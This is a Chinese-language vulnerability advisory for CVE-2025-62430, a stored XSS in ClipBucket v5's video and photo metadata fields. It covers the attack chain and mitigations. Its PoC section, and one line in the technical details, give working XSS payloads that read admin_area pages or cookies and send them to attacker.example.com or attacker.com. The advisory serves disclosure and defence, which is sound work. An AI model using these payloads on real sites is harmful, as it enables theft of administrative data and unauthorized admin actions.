CVE-2025-62430：ClipBucket v5存储型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-62430

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

ClipBucket v5

漏洞概述

ClipBucket v5是一款开源的视频共享平台，该平台允许用户上传、管理和分享视频及照片内容。CVE-2025-62430是存在于ClipBucket v5中的一项存储型跨站脚本（Stored XSS）漏洞，影响版本为5.5.2 #145及之前的所有版本。

该漏洞源于平台对用户输入的视频和照片元数据字段缺乏充分的输入清理与输出编码。在视频方面，受影响的字段包括Tags标签字段，以及Movieinfos中的Genre（类型）、Actors（演员）、Producer（制片人）、Executive Producer（执行制片人）和Director（导演）等字段。在照片方面，Photo Title（照片标题）和Photo Tags（照片标签）字段同样存在输入验证不足的问题。

拥有编辑视频或照片权限的普通用户可以通过这些字段注入恶意脚本，例如通过提交包含闭合分隔符后跟script元素的载荷。注入的脚本会在任何用户（包括未认证的访客和管理员）查看受影响的视频或照片页面时执行。尽管Cookie设置了HttpOnly属性无法直接读取，但攻击者注入的脚本仍可以向admin_area等管理端点发起fetch请求，从而窃取其内容或触发非预期的管理操作。该漏洞的CVSS评分为5.4，属于中危级别，攻击向量为网络，无需认证即可利用，但需要用户交互（如查看受影响的页面）才能触发攻击。

技术细节

该漏洞的核心原理是ClipBucket v5在处理用户提交的元数据字段时，未对用户输入进行充分的HTML实体编码或过滤，导致恶意JavaScript代码能够被持久化存储到数据库中，并在页面渲染时作为HTML内容直接输出执行。

技术实现层面，攻击者首先需要拥有一个具有视频或照片编辑权限的普通用户账户。攻击者通过编辑视频或照片的元数据字段，在Tags、Genre、Actors、Producer、Executive Producer、Director、Photo Title或Photo Tags等字段中提交包含恶意脚本的载荷。典型的XSS载荷形式为：`"></div><script>fetch('/admin_area/...').then(r=>r.text()).then(d=>fetch('https://attacker.com/?'+btoa(d)))</script>`。

由于后端未对这些字段进行适当的输入清理和输出编码，恶意脚本被直接存储到数据库中。当任何用户（包括未认证访客和管理员）访问展示该视频或照片的页面时，服务器从数据库中读取元数据并将其嵌入HTML响应中，浏览器解析时执行注入的脚本。

尽管ClipBucket设置了HttpOnly Cookie属性，阻止了直接通过document.cookie窃取会话信息，但攻击者仍可通过fetch API向管理后台端点（如admin_area下的敏感页面）发起请求，获取页面内容后通过外带通道（如将数据编码后发送到攻击者控制的服务器）实现数据窃取，或触发管理操作（如修改配置、创建管理员账户等）。这种攻击方式使得漏洞的危害性显著提升，即使无法直接获取会话凭证，仍可能造成严重的安全后果。

攻击链分析

STEP 1

步骤1：获取用户账户

攻击者注册或获取一个ClipBucket v5平台的普通用户账户，该账户需具备视频或照片的编辑权限。

STEP 2

步骤2：注入恶意载荷

攻击者编辑平台上的视频或照片，在Tags、Genre、Actors、Producer、Executive Producer、Director、Photo Title或Photo Tags等未充分清理的字段中注入包含恶意JavaScript代码的XSS载荷。

STEP 3

步骤3：载荷持久化存储

恶意脚本未经适当的输入过滤和输出编码处理，被直接存储到ClipBucket的数据库中。

STEP 4

步骤4：触发脚本执行

当任何用户（包括未认证访客或管理员）浏览展示该视频或照片的页面时，服务器从数据库读取恶意元数据并嵌入HTML响应中，浏览器解析并执行注入的脚本。

STEP 5

步骤5：数据窃取与权限提升

注入的脚本利用fetch API向admin_area等管理端点发起请求，窃取敏感管理页面内容或触发非预期的管理操作（如修改配置、创建账户等），数据通过外带通道发送到攻击者控制的服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
CVE-2025-62430 - ClipBucket v5 Stored XSS PoC
Affected: ClipBucket v5 through build 5.5.2 #145
Fixed in: 5.5.2 build #146
-->

<!-- Step 1: Login as a regular user with edit permissions -->
<!-- Step 2: Edit a video or photo and inject payload into vulnerable fields -->

<!-- Payload for Video Tags field -->
<script>fetch('/admin_area/index.php').then(r=>r.text()).then(d=>fetch('https://attacker.example.com/exfil?d='+btoa(d)))</script>

<!-- Payload for Movieinfos - Genre field -->
"><img src=x onerror="fetch('/admin_area/edit_account.php?uid=1').then(r=>r.text()).then(d=>new Image().src='https://attacker.example.com/?'+btoa(d))">

<!-- Payload for Movieinfos - Actors field -->
</div><script>var x=new XMLHttpRequest();x.open('GET','/admin_area/',true);x.onload=function(){new Image().src='https://attacker.example.com/?'+btoa(this.responseText)};x.send();</script>

<!-- Payload for Photo Title field -->
"><svg onload=fetch('https://attacker.example.com/?cookie='+document.cookie)>

<!-- Payload for Photo Tags field -->
<script>fetch('/admin_area/manage_users.php').then(r=>r.text()).then(t=>fetch('https://attacker.example.com/exfil',{method:'POST',body:t}))</script>

<!-- Step 3: Wait for any user (including admin) to view the affected video/photo page -->
<!-- Step 4: The injected script executes in the victim's browser context -->
<!-- Step 5: Sensitive admin data is exfiltrated to attacker's server -->

影响范围

ClipBucket v5 ≤ 5.5.2 #145

防御指南

临时缓解措施

在等待官方升级期间，建议采取以下临时缓解措施：1）对用户提交的元数据字段实施服务端输入过滤，拒绝包含HTML标签或JavaScript关键字的输入；2）在前端渲染时对所有用户输入的元数据进行HTML实体编码；3）部署Web应用防火墙（WAF）规则，拦截常见的XSS攻击载荷；4）实施严格的内容安全策略（CSP），限制内联脚本执行；5）监控admin_area端点的异常访问行为；6）限制普通用户编辑元数据字段的权限，仅允许可信用户操作。